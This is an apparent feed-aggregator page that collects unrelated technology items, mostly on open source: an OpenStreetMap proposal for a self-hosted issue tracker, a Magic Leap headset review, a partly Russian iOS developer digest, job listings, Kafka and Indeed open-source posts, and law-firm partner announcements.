Agile Infoways is a leading PHP, Node.js, CMS, and Odoo ERP development company in the USA. Hire our dedicated web app developers, who are experts in PHP, AngularJS, Python, and open source development.
          Towards a dedicated public issue tracking/project management system for OSM      Cache   Translate Page   Web Page Cache   

We have various communication channels in OpenStreetMap being used for different needs in communication. The mailing lists and forum work reasonably well for free and open discourse of the community, changeset discussions allow communicating on specific edits in the map (and we have for example Pascal's tool to look through these). We have the user diaries for people publishing their thoughts and experiences on the project and discussing them with others. And we have the OSM wiki which is used as a place to document things.

All of these have their issues and room for improvements but they are widely used and accepted as the platforms where communication happens. And they all have relatively low entry barriers as evidenced by the fact that quite a lot of people use them actively.

What we don't have, and where OpenStreetMap has a fairly obviously increasing need, is a means for project organization and related communication, task and issue tracking etc. There is a very old trac instance but this is hardly used any more and is fairly awkward to use, in particular for non-programmers. Safe to say this is not an established communication platform any more.

Because of that people have started widely using external commercial platforms, in particular github, for this kind of work.

Specific examples:

  • corporations doing organized edits have github repositories to track their work - like here, here, here and here
  • import planning is frequently performed on github - like here and here
  • there are attempts to move tagging discussion to github issue trackers here
  • the OSMF and its working groups using github for issue tracking (both publicly and internally), public examples here and here

For OpenStreetMap this is not a good development for various reasons:

  • github is designed for software developers and is practically much less accessible for non-developers. Even if non-developers manage to adapt to this they will always feel less at home there and as a result there is an inherent dominance of the software developers over non-developers on github.
  • the requirement to register on an external platform and accept the terms of service there poses a highly problematic hurdle. It should always be the goal that an OSM community member should be able to participate in all public community discourse without such hurdles.
  • quite a few people have principal ethical concerns regarding platforms like github which are usually financed through either advertisement or sale of personal information about its users.
  • since the github software is not open source, use of github is in conflict with the general culture of OpenStreetMap to base itself on open source technology.

Because of these problems I am generally inclined to boycott attempts to move non-development discussions to github. But this is somewhat difficult if you can't point to a suitable alternative. I would therefore propose we set up an open source project management system that can be used by everyone with an OSM account for use by the OSM community. There are quite a few software products available for this.

There are various questions and arguments that might come up regarding this suggestion:

  • Do we really need this kind of tool in OSM? Yes, the fact that github is used so widely for OSM projects is a clear indicator.
  • But github is so convenient, everyone already knows how to use it while something else you would have to newly learn to use. Yes, for you that might apply - but you are putting the convenience of you and a few other people familiar and comfortable with github over the interests of the vast majority of mappers.
  • Why should the OSMF invest money and work into self hosting something when there are github alternatives based on open source software available for use that might offer affordable service plans for an organization like OSM? Mostly to ensure a low entry barrier for people to participate by requiring nothing more than an OSM account. If this could be achieved with an externally hosted tool and reliability of the service and access to and ownership of the database are ensured, external hosting would IMO also be an option.
  • Won't this fragment the discourse in the OSM community by creating yet another set of communication channels you need to follow to stay informed? Yes, that is a possibility - but as said this is already happening through the use of github at the moment. I think a dedicated OSM platform would improve the situation on this matter.
  • Should this be a pure project management/issue tracking platform or also a source code repository and version management system? That's a good question. Many of the free software options available offer both. But most software development projects around OpenStreetMap are independently managed and you can't force any of them to move. The core arguments for not using github i listed do not necessarily apply to all of these projects. The main use case would at least initially be non-development projects. And therefore usability for non-developers should be a primary concern.
  • Great, but who does the work necessary to set this up? Ideally such a platform would be integrated into the existing OSM website with notifications via the OSM website messaging system, using the configured language settings and possibly connections to changeset discussions etc. That would be a lot of work to set up. But running it separately similar to the OSM Forum would already be a useful first step. This would require some work from operations to set this up and maintain it. But the more difficult steps are probably to come to a decision with wide support what we need in terms of features, what software should be chosen for this and to configure and adjust it for OpenStreetMap's needs. This post is meant to start the discussion on these questions.

          Hollywood Goes Open Source: Academy Teams Up With Linux Foundation to Launch Academy Software Foundation      Cache   Translate Page   Web Page Cache   
Hollywood now has its very own open source organization: The Academy of Motion Picture Arts and Sciences has teamed up with the Linux Foundation to launch the Academy Software Foundation, which is dedicated to advance the use of open source in film making and beyond. The association’s founding members include Animal Logic, Autodesk, Blue Sky […]

          Micropython for Unified Extensible Firmware Interfaces (UEFI)      Cache   Translate Page   Web Page Cache   
TianoCore is the community supporting an open source implementation of a Unified Extensible Firmware Interface (UEFI), which is the code that sits between an operating system and the hardware's firmware. We're all familiar with UEFI on modern computers; it supplanted what was called BIOS and is shown when getting into a machine's setup. The project has […]
          Comment on OTTO: A Pi Based Open Source Music Production Box by Ren      Cache   Translate Page   Web Page Cache   
I hadn't heard of Fe-Pi (Iron Pie?). Nice... I might order that audio [p]hat/shield/cape/wing/etc today. https://fe-pi.com/products/fe-pi-audio-z-v2
          Comment on Open Source Meetup in Munich- Feb 26 – with Kev Needham and Chris Hofmann by ProxyBig      Cache   Translate Page   Web Page Cache   
ProxyBig: I found a great...
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI      Cache   Translate Page   Web Page Cache   
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          Magic Leap finally ships its mixed reality headset      Cache   Translate Page   Web Page Cache   

For 7 years, Magic Leap managed to sell us a dream: stunning demos (some of which were possibly manipulated) and genuinely new technologies. The first version of its mixed reality glasses was finally unveiled a few days ago, and the first reviews are not exactly flattering. It must be said that expectations were enormous, with prestigious investors and a lot of money, almost 3 billion dollars!

Yes, Magic Leap One Creator has finally launched, in limited distribution for now, for the modest sum of $2,295. The device is standalone in the sense that it does not need a connected computer, since it has its own local processing, but you have to wear an external module. That module is fairly bulky and connects to the glasses by wire. There is also a controller. What strikes you at first glance is how massive the whole thing is: less so than a HoloLens, but still imposing. The front face carries multiple sensors and cameras.

The Lightpack, the famous belt-worn module, houses the CPU and GPU: an Nvidia Parker SoC, 128 GB of storage (only 95 of which are available), an Nvidia Pascal GPU (256 CUDA cores), the battery, 8 GB of memory, and WiFi and Bluetooth support. The announced battery life is 3 hours of continuous use, but the manufacturer does not say whether that means intensive or normal usage. Early testers note that the device is comfortable to wear. However, for The Verge, Magic Leap does not deliver the experience expected after so much anticipation. It does not clearly stand apart from a HoloLens and suffers from the same field-of-view limitations. Our colleagues point to the gulf between the promises, and the billions invested, and the reality of this device. They also note the presence of the controller, which resembles that of the Oculus Go. The applications and demos on offer seem to be of good quality, but it is hard to get a sense of the device's real potential.

This model is aimed more at enthusiasts and developers than at the general public, and the price is very dissuasive. But unlike HoloLens, Magic Leap wants to take this technology mainstream, and we are still far from that. An enormous amount of design work, both software and hardware, remains to be done, and of course at a much more aggressive price. Integrating the compute into the headset itself rather than an external box will also need consideration. As with other standalone devices, battery life will have to improve. On content, a problem for every manufacturer, Magic Leap will need to win over publishers and developers quickly, something its competitors are struggling to do.

Magic Leap uses a dedicated Linux distribution: LuminOS. The OS is currently at version 0.91 and still a pre-release, which affects how the headset can be used. The system was adapted by in-house teams and derives from Linux and AOSP (Android Open Source Project). We find the usual layers of an OS: the kernel, system services, platform APIs, runtimes (Lumin), the 3D engines (Unreal, Unity), the interface and the applications. The Lumin runtime contains all of Magic Leap's APIs and libraries.

The manufacturer launched its SDK, the Lumin SDK, back in March. It is compatible with Unreal and Unity, and an emulator is included. The SDK is currently at version 0.16.0, but the manufacturer notes that not everything is available yet and that the kit still has bugs and flaws. It will evolve very regularly as it stabilizes. It can be used on macOS and Windows.

The interface is built mainly around two elements:

- Universe: the basic ergonomics for interacting with the OS. It is not an immersive application; Universe works directly with Landscape. Universe provides the basic apps for navigation: the home view, the app launcher, settings and notifications.

- Landscape: the base canvas for Magic Leap's spatial model, i.e. how virtual objects are mapped onto and mixed with reality.

On top of this comes a third building block aimed at web developers: Prismatic. It is a JavaScript library that makes it easier to develop virtual/augmented web content with the Lumin runtime. The idea is to be able to use that content and those apps with Magic Leap.

Note that at present only publishers and companies can publish content. The developer side will arrive soon.


          How to Install Apache Maven on CentOS 7      Cache   Translate Page   Web Page Cache   
Apache Maven is an open source software project management and build automation tool, based on the concept of a project object model (POM). It is primarily used for building and deploying Java-based applications, but...
          iOS digest #27: React Native, how much longer? 10 years of the App Store, what's new in Swift 4.2      Cache   Translate Page   Web Page Cache   

In this issue: a look at CI services, a bit of reverse engineering, tools to make life easier, and admiring the Apple Design Awards.

News

Swift Evolution
Judging by the updated readme, Swift 5 should be expected in early next year.

CarPlay iOS 12.0 Beta 1 to Beta 2 API Differences
iOS 12 Beta 2 added a lot of new CarPlay methods.

The App Store turns 10
The App Store has turned 10. Those 10 years changed a great deal about business and content consumption on mobile devices.

10 years of the App Store: The design evolution of the earliest apps
And one more article about the anniversary: how apps have changed over these 10 years.

Apple Design Awards 2018
The winners of the Apple Design Awards 2018. It is interesting to watch how design trends change from year to year.

In 4 years the Swift repository has already accumulated 18,000 pull requests.

initial checkin, nothing much to see here.
Although Swift was announced 4 years ago, it actually just turned 8.

Articles

Swift for Android: Our Experience and Tools
React Native не нужен, или как Readdle решили сделать андроид приложение на Swift. Судя по примеру приложения, не очень похоже на чистый Swift. Стоит ли оно того? Думаю, узнаем из новых статей от ребят.

Benchmark of Swift extensions vs methods: Swift 4.1
О боже, о боже, наличие множества экстеншенов замедляет скорость компиляции. Но только эта разница становится значимой, если у вас тысячи методов.

Интересная статистика — чему больше всего уделяют внимания на WWDC. Радует, что в этом году уделили больше времени macOS.

Enabling newly added opt-in features in Xcode 10
Если вы уже пользуетесь Xcode 10, то имеет смысл включить новые фичи.

Custom Intents with SiriKit on iOS 12
Уже подоспели первые туториал по SiriKit. Не забываем, что много из этого доступно в видео с WWDC.

Быстрые команды Siri
А если хотите на русском, то вот (не перевод).

Any[Object]
Тип AnyObject в Swift не такой простой как кажется. В конце статьи есть ряд правил, которые помогут предотвратить неочевидные баги.

The iOS Testing Manifesto
Это уже становится традицией — подробный гайд про тестирование.

Painless Core Data in Swift
Еще немного советов по работе с Core Data.

Continuous Integration Services for iPhone Apps in 2018
Обзор CI сервисов. В конце есть Editor’s Choice.

AvitoTech team playbook
Avito делятся, как у них устроена команда, процессы, а также рассказывают про историю, ценность компании.

iOS Developer Skills Matrix
Матрица Junior-Middle-Senior. Все, конечно, условно и зависит от компании, но все равно забавно посмотреть.

State of React Native 2018

Или все-таки нужен React Native? Facebook работает над новой версией RN, в которой будет легче работать с нативными элементами. При этом старые приложения будет легко адаптировать. Ждем новостей ближе к концу года.

React Native at Airbnb
Цикл статей из 5 статей от Airbnb, где они рассказывают о своем двухлетнем опыте использования React Native. Если коротко, то поигрались и хватит. Но опыт интересный в любом случае.

The Case for React Native
А Эш рассказывает, как ему нравится RN. Решать вам, использовать или нет.

Airbnb and React Native Expectations
А потом решил прокомментировать статьи от Airbnb. Тоже интересное мнение.

React Native: A retrospective from the mobile-engineering team at Udacity
И еще одна компания попробовал RN и отказалась. Статья странноватая, но все же.

What we learned about CI/CD analysing 75k builds
Интересная статистика по поводу использования CI в мобильных проектах.

The Story Behind Susan Kare’s Iconic Design Work for Apple
История создания иконок для первых макинтошей.

iPad Navigation Bar and Toolbar Height Changes in iOS 12
Просто взяли, поменяли высоты навигейшен бара или таббара и никому не сказали. Молодцы Apple.

How to Use Slack and Not Go Crazy
Несколько советов, как работать со Slack, чтобы жизнь была немного проще.

A Year of Monument Valley 2
Monument Valley подвели итоги года. Там же доступны итоги прошлых лет. Интересно наблюдать, как вырос китайский рынок.

Reverse Engineering Instruments’ File Format
Почему бы не пореверс-инженерить формат файла инструментов в Xcode?

Code

What’s new in Swift 4.2
Xcode 10 c поддержкой Swift 4.2 выйдет осенью, а пока можно потыкать бету и посмотреть, какие фичи нас ждут.

Swift’s new calling convention
Новый calling conventions в Swift 4.2 должен улучшить производительность за счет сокращения вызовов retain, release. Ждем бенчмарки.

Icon for File with UIKit
Получаем картинки для разных типов файлов. В общем-то, это достаточно популярный подход в macOS, в CleanMyMac мы его тоже часто используем.

Writing self-documenting Swift code
Я всегда за то, чтобы использовать переменные или функции вместо комментариев, которые устаревают, теряются или еще что-то. На эту тему есть еще хорошая шутка. Джон рассказывает еще про несколько подходов, как сделать код самодокументируемым.

Making Swift tests easier to debug
Ни один дайджест не обходится без статей от Джона. Читаемость тестов не менее важна, чем читаемость самого кода, так как это пример того, как использовать код и они зачастую полезнее любой документации.

Swift Diagnostics: #warning and #error
Возможно, вы уже видели, что в Swift 4.2 добавили #warning и #error. Но как это реализовано под капотом?

Enumerating enum cases in Swift
Наконец-то можно получить все cases в enum и не хардкодить это каждый раз.

Swift Tip: Quick Performance Timing
Небольшой сниппет, как замерить скорость выполнения какой-либо операции.

Exploring @dynamicMemberLookup
Долгожданный динамизм добавили даже раньше времени — в Swift 4.2. Вспоминаем что это такое и еще полезный хак, как не выстрелить себе в ногу.

Finding Non-localized Strings
Всего один ключ поможет найти не локализованные строки в приложении.

@autoclosure what, why and when
Никогда не использовал и уже забыл, что такое есть в Swift. Кто-то его использует?

Tools & Libs

Xcode для iPad, почему бы и нет.

MarzipanTool
Хотите попробовать запустить iOS приложение на macOS? Тогда этот репозиторий специально для вас.

xcprojectlint
Был линтер для IB, должен быть и линтер для файлов проекта.

iOSLocalizationEditor
Довольно удобное приложение для редактирования файлов локализации.

Extensible mobile app debugger
Facebook выпустил платформу для дебага мобильных приложений с десктопным приложением и плюшками. Кто уже успел попробовать?

Sift app
Приложение, которое показывает запросы в сеть от всех приложений. В AppStore такое не пустят, так что можно только сбилдить тебе на устройство.

Check if UIImage exists in assets in compile time
Если вы не пользуетесь SwiftGen, R.swift или другим подобным решением, либо все еще пишите на Objective-C, то это может стать полезной находкой. Скрипт проверяет наличие используемых картинок в проекте.

NonEmpty
Библиотека, которая гарантирует на этапе компиляции, что коллекция будет непустая 😱

Bartinter
Если контент приложения налазит на статус бар, по-любому будет ситуация, когда он совпадет с фоном. Чтобы не париться, можно взять библитеку, которая определяет яркость фона и меняет цвет статус бара.

SwiftServerSide-Vapor
Вроде довольно неплохой пример приложения на Swift 4.1 и Vapor 3. На китайском, правда, но если хотите сделать регистрацию, какой-то фид и прочее на Vapor, то можно посмотреть.


← Предыдущий выпуск: iOS дайджест #26


          Motion picture academy and Linux Foundation partner to launch Academy Software Foundation, an open source forum for developers in motion picture and media space (Frederic Lardinois/TechCrunch)      Cache   Translate Page   Web Page Cache   

Frederic Lardinois / TechCrunch:
Motion picture academy and Linux Foundation partner to launch Academy Software Foundation, an open source forum for developers in motion picture and media space  —  Open source is everywhere now, so maybe it's no surprise that the Academy of Motion Picture Arts and Sciences (yes …


          JAVA EN OPEN SOURCE ONTWIKKELAAR HASSELT - Xplore Group - Kontich      Cache   Translate Page   Web Page Cache   
Bij voorkeur behaalde je een bachelor of masteropleding, of volgde je een opleiding tot Java-programmeur bij de VDAB....
Van Bonque - Sat, 28 Jul 2018 10:43:02 GMT - Toon alle vacatures in Kontich
          JAVA EN OPEN SOURCE ONTWIKKELAAR KONTICH (Antwerpen) - Xplore Group - Kontich      Cache   Translate Page   Web Page Cache   
Bij voorkeur behaalde je een bachelor of masteropleding, of volgde je een opleiding tot Java-programmeur bij de VDAB....
Van Bonque - Sat, 28 Jul 2018 10:43:03 GMT - Toon alle vacatures in Kontich
          JAVA EN OPEN SOURCE ONTWIKKELAAR MERELBEKE (GENT) - Xplore Group - Kontich      Cache   Translate Page   Web Page Cache   
Bij voorkeur behaalde je een bachelor of masteropleding, of volgde je een opleiding tot Java-programmeur bij de VDAB....
Van Bonque - Sat, 28 Jul 2018 10:43:03 GMT - Toon alle vacatures in Kontich
          Audacious 3.10      Cache   Translate Page   Web Page Cache   
Description: Audacious is an open source audio player that plays your music how you want it, without stealing away your computer’s resources from other tasks.Drag and drop folders and individual song files, search for artists and albums in your entire music library, or create and edit your own custom playlists. Listen to CD’s or stream […]
          OTTO: A Pi Based Open Source Music Production Box      Cache   Translate Page   Web Page Cache   

Want an open source portable synth workstation that won’t break the bank? Check out OTTO. [Topisani] started OTTO as a clone of the well-known Teenage Engineering OP-1. However, soon [Topisani] decided to branch away from simply cloning the OP-1 — instead, they’re taking a lot of inspiration from it in terms of form factor, but the UI will eventually be quite different.

On the hardware side, the heart of the OTTO is a Raspberry Pi 3. The all-important audio interface is a Fe-Pi Audio Z V2, though a USB interface can be used. The 48 switches and four rotary encoders …read more


           Best Open Source For Haliday Letting Clone Script - Appkodes ( Amqui)      Cache   Translate Page   Web Page Cache   
Airbnb Clone is a holiday letting clone script who is aimed after grant rooms because peoples regarding Holidays thru online reserving all round the world. Airbnb clone has a lump over services provide choice honestly flip your internet site among a hot m...
          Telecommute Full Stack Developer      Cache   Translate Page   Web Page Cache   
A web design and development company needs applicants for an opening for a Telecommute Full Stack Developer. Core Responsibilities of this position include: Jumping in and developing in a brand new development stack Interacting with clients and understanding the needs of the business Skills and Requirements Include: Strong understanding of JavaScript and popular frameworks like Angular, React, or VueJS Pixel-level perfection when implementing designs created by your team The ability to iterate and ship ideas quickly, with loose (at best) direction A love of Open Source software Positive can-do attitude with the ability to follow through
          Motion picture academy partners with Linux Foundation to launch an open source foundation for developers working on animation, visual effects, and more (Frederic Lardinois/TechCrunch)      Cache   Translate Page   Web Page Cache   

Frederic Lardinois / TechCrunch:
Motion picture academy partners with Linux Foundation to launch an open source foundation for developers working on animation, visual effects, and more  —  Open source is everywhere now, so maybe it's no surprise that the Academy of Motion Picture Arts and Sciences (yes, the organization behind the Oscars) …


          What’s new in Julia: Version 1.0 is here      Cache   Translate Page   Web Page Cache   

After nearly a decade in development, Julia, an open source, dynamic language geared to numerical computing, reached its Version 1.0 production release status on August 8, 2018. The previous version was the 0.6 beta.

Julia, which vies with Python for scientific computing, is focused on speed, optional typing, and composability. Programs compile to native code via the LLVM compiler framework. Created in 2009, Julia’s syntax is geared to math; numeric types and parallelism are supported as well. The standard library has asynchronous I/O as well as process control. logging, and profiling.

To read this article in full, please click here

(Insider Story)
          PnP SharePoint Framework Property Controls v1.9.0 released      Cache   Translate Page   Web Page Cache   

Version 1.9.0 of the SharePoint Framework Property Controls (@spfx/spfx-property-controls) has been released. This is an open source library that shares a set of reusable property pane controls, which can be used in your SharePoint Framework solutions. This release includes the following changes: Enhancements PropertyFieldCollectionData: Added custom validation for string, number, icon, and URL field types

The post PnP SharePoint Framework Property Controls v1.9.0 released appeared first on Elio Struyf.


          DevOps Engineer - Ritchie Bros. - Burnaby, BC      Cache   Translate Page   Web Page Cache   
Integrate, manage and support a diverse range of Open Source and commercial middleware, tools, platforms and frameworks to enable continuous product delivery....
From Ritchie Bros. - Sat, 30 Jun 2018 02:48:25 GMT - View all Burnaby, BC jobs
          Senior DevOps Engineer - Long Term Contract - Ignite Technical Resources - Burnaby, BC      Cache   Translate Page   Web Page Cache   
Integrate, manage and support a diverse range of Open Source and commercial middleware, tools, platforms and frameworks to enable continuous product delivery....
From Ignite Technical Resources - Thu, 21 Jun 2018 08:15:40 GMT - View all Burnaby, BC jobs
          Development Operations Engineer - Ritchie Bros. - Vancouver, BC      Cache   Translate Page   Web Page Cache   
Integrate, manage and support a diverse range of Open Source and commercial middleware, tools, platforms and frameworks to enable continuous product delivery....
From Indeed - Wed, 08 Aug 2018 18:36:45 GMT - View all Vancouver, BC jobs
           Zimbra Web Mail Client login       Cache   Translate Page   Web Page Cache   
Zimbra provides open source server and client software for messaging and collaboration. To find out more visit https://www.zimbra....
          [مکینتاش] دانلود Brackets v1.13 MacOSX - نرم افزار ویرایشگر متن برای مک      Cache   Translate Page   Web Page Cache   

دانلود Brackets v1.13 MacOSX - نرم افزار ویرایشگر متن برای مک#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

نرم‌افزار Brackets یک ویرایشگر متن رایگان، با حجم کم و بسیار قدرتمند است، که توسط شرکت ادوبی Adobe و به وسیله HTML و CSS و Javascript تولید شده است. این ویرایشگر کد بر خلاف تمامی نرم افزارهای ادوبی به صورت منبع باز (Open Source) برای توسعه دهنده های وب ارائه شده است، که با ارائه ابزارهایی منحصر به فرد، خلاقیت شما را در زمینه ویرایش متن ارتقا می‌بخشد. انجام عملیات کدنویسی در این برنامه مدرن و کاربردی بسیار لذت‌بخش است. این نرم افزار در حال حاضر علاوه بر ویرایشگر عادی، یک ویرایشگر سریع، تنظیمات و پیش نمایش زنده از تغییرات ...


http://p30download.com/77100

مطالب مرتبط:



دسته بندی: دانلود » مکینتاش » نرم افزار » دسکتاپ, نرم افزار » توسعه, نرم افزار, نرم افزار » کاربردی
برچسب ها: , , , , , , ,
لینک های مفید: خرید کارت شارژ, شارژ مستقیم, پرداخت قبض, خرید آنتی ویروس, خرید لایسنس آنتی ویروس, تبلیغات در اینترنت, تبلیغات اینترنتی
© حق مطلب و تصویر برای پی سی دانلود محفوظ است همین حالا مشترک این پایگاه شوید!
لینک دانلود: http://p30download.com/fa/entry/77100


          Why Join an Open Source Software Foundation?      Cache   Translate Page   Web Page Cache   

Many developers often find several aspects of establishing an open source project to be overwhelming. Apart from building up the software itself, open source project developers have to ...

The post Why Join an Open Source Software Foundation? appeared first on SourceForge Community Blog.


          Peer Review Week 2018: We’re havin’ a party! : Collaborative Knowledge Foundation      Cache   Translate Page   Web Page Cache   
coko.foundation
Please join us on September 12 for what promises to be an hour of lively discussion about all of the different models of peer review our community member presenters employ, and the open source, modular tools they are building to support these within their own xPub deployments.
posted by friends:  (2)
@openscience on Twitter
@openscience: Save the date! It's going to be a week full of 'cant-miss' events! @peerrevweek coko.foundation/peer-review-we… #PRW18 #PeerReviewWeek18 @elife @hindawi @ucpress @djjmorgan @mynameissmeall @kristenratan
@scholasticahq on Twitter
@scholasticahq: Save the date! It's going to be a week full of 'cant-miss' events! @peerrevweek coko.foundation/peer-review-we… #PRW18 #PeerReviewWeek18 @elife @hindawi @ucpress @djjmorgan @mynameissmeall @kristenratan
posted by followers of the list:  (0)

          Ultracopier      Cache   Translate Page   Web Page Cache   
Ultracopier to zamiennik systemowego modułu odpowiedzialnego za kopiowanie i przenoszenie plików. Jakie są jego zalety w stosunku do standardowych funkcji wbudowanych w system Windows? Jest ich przynajmniej kilka. Jednak jedną z największych jest możliwość wygodnego zarządzania listą zadań. Całość wyposażona została w przyjazny, w pełni konfigurowalny interfejs użytkownika. Główne cechy programu: - wyświetlanie szczegółowych informacji na temat postępu przetwarzania danych, - wstrzymywanie i wznawianie zadań w dowolnym momencie, - możliwość dynamicznego modyfikowania i przeszukiwania kolejki zadań, - limitowanie prędkości kopiowania, - rozmaite opcje dotyczące silnika (rozmiar buforu, algorytm transferu, zachowywanie praw dostępu i atrybutów czasowych, automatyczne uruchamianie transferu, przenoszenie całych folderów, obsługa kolizji nazw i błędów, weryfikacja sum kontrolnych, sprawdzanie ilości wolnego miejsca na dysku itd.), - możliwość definiowania filtrów dotyczących plików i folderów (w tym obsługa wyrażeń regularnych), - zmienianie nazw kolizyjnych plików na podstawie zadanego szablonu, - wyświetlanie ostrzeżeń systemowych, - możliwość dostosowania wyglądu aplikacji do własnych potrzeb (ustawianie skórki, wyświetlanie okna w trybie "zawsze na wierzchu", pokazywanie dwóch pasków postępu), - zapisywanie szczegółowych informacji diagnostycznych dotyczących transferów, błędów i innych operacji, - minimalizacja do obszaru powiadomień, - interfejs działający z poziomu linii poleceń, - modularna budowa (możliwość korzystania z alternatywnych silników kopiowania). Ultracopier jest rozpowszechniany na zasadach Open Source (licencja GNU GPL). Projekt posiada bardzo dobrą dokumentację oraz wersje gotowe do wykorzystania na najpopularniejszych systemach operacyjnych (oprócz Windowsa, wspierane są również GNU/Linux i Mac OS X).
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          Open Source At Indeed: Sponsoring Webpack

Indeed is proud to announce our sponsorship of webpack. Like many other companies, Indeed uses webpack to help deliver a high-quality user experience. Because webpack is so important to our development process, we’re joining our industry peers in supporting and sponsoring the development of this critical open source technology. Rebecca Murphey, Front-End Engineering Lead at […]

The post Open Source At Indeed: Sponsoring Webpack appeared first on Indeed Engineering Blog.


          Open Source at Indeed: Sponsoring the Apache Software Foundation

As Indeed continues to grow our commitment to the open source community, we are pleased to announce our sponsorship of the Apache Software Foundation. Earlier this year, we joined the Cloud Native Computing Foundation and began sponsoring the Python Software Foundation. For Indeed, this is just the beginning of our work with open source initiatives.  […]

The post Open Source at Indeed: Sponsoring the Apache Software Foundation appeared first on Indeed Engineering Blog.


          Open Source at Indeed: Sponsoring the Python Software Foundation

At Indeed, we’re committed to taking a more active role in the open source community. Earlier this year, we joined the Cloud Native Computing Foundation. This week, we are pleased to announce that Indeed is sponsoring the Python Software Foundation.  We write lots of Python code at Indeed — it’s one of our major languages […]

The post Open Source at Indeed: Sponsoring the Python Software Foundation appeared first on Indeed Engineering Blog.


          Indeed Expands its Commitment to Open Source

At Indeed, we’re committed to an active role in open source communities. We’re proud to announce that we’ve joined the Cloud Native Computing Foundation (CNCF), an open source software foundation dedicated to making cloud-native computing universal and sustainable. The CNCF, part of The Linux Foundation, is a vendor-neutral home for fast-growing projects. It promotes collaboration […]

The post Indeed Expands its Commitment to Open Source appeared first on Indeed Engineering Blog.


          Apache Kafka: A Framework for Handling Real-Time Data Feeds

Apache Kafka is a distributed streaming platform. It is incredibly fast, which is why thousands of companies like Twitter, LinkedIn, Oracle, Mozilla and Netflix use it in production environments. It is horizontally scalable and fault tolerant. This article looks at its architecture and characteristics. Apache Kafka is a powerful asynchronous messaging technology originally developed by […]
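
As a minimal sketch of the publish/subscribe flow described above (assuming a broker running on localhost:9092 and the third-party kafka-python client; the topic name "demo-events" is made up), a producer appends messages to a log-like topic and an independent consumer replays them:

    from kafka import KafkaProducer, KafkaConsumer

    # Publish a few messages; the broker persists them in an append-only log.
    producer = KafkaProducer(bootstrap_servers="localhost:9092")
    for i in range(3):
        producer.send("demo-events", f"event {i}".encode())
    producer.flush()

    # A consumer reads the same stream from the beginning, independently of the
    # producer; consumer_timeout_ms stops iteration once the log goes idle.
    consumer = KafkaConsumer(
        "demo-events",
        bootstrap_servers="localhost:9092",
        auto_offset_reset="earliest",
        consumer_timeout_ms=5000,
    )
    for record in consumer:
        print(record.topic, record.offset, record.value)

Horizontal scalability comes from partitioning topics across brokers; consumers in the same group split the partitions among themselves.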

The post Apache Kafka: A Framework for Handling Real-Time Data Feeds appeared first on Open Source For You.


          Java Developer - IAM - Codeworks - Milwaukee, WI
Experience in J2EE web application development and ability to use open source libraries. Our direct client is seeking a Java Developer with experience in...
From Indeed - Thu, 02 Aug 2018 16:23:50 GMT - View all Milwaukee, WI jobs
          New partner appointments at Marval, O’Farrell & Mairal

Marval promotes three to partner


 Marval, O’Farrell & Mairal promoted three senior associates to partner: Diego Fernández, Gustavo Morales Oliver and Martín Mosteirin. These promotions strengthen the development of three of the firm’s most innovative, cutting-edge practice areas: Information Technology & Privacy; Compliance, Anticorruption & Investigations; and Life Sciences. The new partners already have a wealth of experience and are highly specialized in their respective areas of expertise:


  • Diego Fernández is a technology expert with 14 years of experience. His wide range of expertise includes IT law, software licensing, E-commerce, IT agreements, due diligence and IT compliance, privacy, data protection, cyber security, Internet law, and cloud computing. Diego is ranked as a leading lawyer in the Argentina TMT section of Chambers Latin America. He has a Master’s in Information Technology and Privacy Law from The John Marshall Law School, Chicago, and is a former foreign associate in the IT & Privacy group at Foley & Lardner, Chicago. He is also a Board Member and Vice-Chair of the South America Committee of the International Technology Law Association (ITechLaw), co-chair of the Argentina Chapter of the International Association of Privacy Professionals (IAPP), and a member of the Technology Committee of the IBA, the Internet Committee of the INTA, and the Open Source Software Committee of the ABA.


  • Gustavo Morales Oliver is a key member of Marval’s compliance and anti-corruption practice. He is fully dedicated to this practice area, giving him unique, hands-on experience of compliance programs, investigations and related litigation. He has advised international companies from a range of industries and participated in many local and international investigations and cases in this highly specialized field. Gustavo teaches Compliance at the Universidad Torcuato Di Tella Law School. He earned an LL.M. from the University of Illinois and is admitted to practice in both Argentina and New York, USA.


  • Martín Mosteirin advises leading multinational companies on regulatory strategies and compliance in the pharmaceutical, healthcare, biotech, medical and medical-technology devices, dental products, cosmetics, toiletries and perfumes, household cleaning products and food sectors. He has strong expertise in both contentious and non-contentious matters. Martín holds postgraduate qualifications in Pharmaceutical Regulatory Matters and Corporate Advice on the International Trade of Goods, Financial Operations and Payment Methods in Contemporary Commercial Law.

Santiago Carregal, chair of Marval, O’Farrell & Mairal’s executive board, commented on the announcement: “These latest promotions demonstrate Marval’s commitment to developing the Argentine legal market and maintaining the firm’s position at the forefront of legal services in the country. We are proud to enhance these innovative practice areas with the promotions of Diego, Gustavo and Martín. All three have outstanding careers in their fields and offer counsel of the highest quality. Marval continues strengthening its leadership in Argentina and expanding its practice to non-traditional areas in order to grant a genuinely full-service offering that is unique in the Argentine market.”

Marval names three new partners
On August 1, 2018, Marval, O’Farrell & Mairal promoted three of its senior associates to partner: Diego Fernández, Gustavo Morales Oliver and Martín Mosteirin. With these promotions, the firm is driving the development of three novel practice areas: Information Technology and Privacy; Compliance, Anticorruption and Investigations; and Life Sciences. The new partners have extensive experience and solid training in their specialties.


  • Diego Fernández: A technology expert with 14 years of experience. His broad expertise includes information technology law, software licensing, e-commerce, IT agreements, IT due diligence and compliance, privacy, data protection, cybersecurity, Internet law and cloud computing. Diego has been recognized as a leading TMT lawyer in Argentina by Chambers Latin America. He completed a master’s degree in Information Technology and Privacy at The John Marshall Law School, Chicago, and worked as a foreign associate in the IT & Privacy practice group at Foley & Lardner, Chicago. He is a Board Member and chair of the South America Committee of the International Technology Law Association (ITechLaw), vice-chair of the Buenos Aires KnowledgeNet chapter of the International Association of Privacy Professionals (IAPP), a member of the Technology Committee of the International Bar Association (IBA) and the Internet Committee of the International Trademark Association (INTA), and a member of the Open Source Software Committee of the American Bar Association (ABA).


  • Gustavo Morales Oliver: A key member of the firm’s Compliance and Anticorruption practice area, Gustavo dedicates 100% of his time to this practice, which has given him unique, hands-on experience in compliance programs, investigations and related litigation.

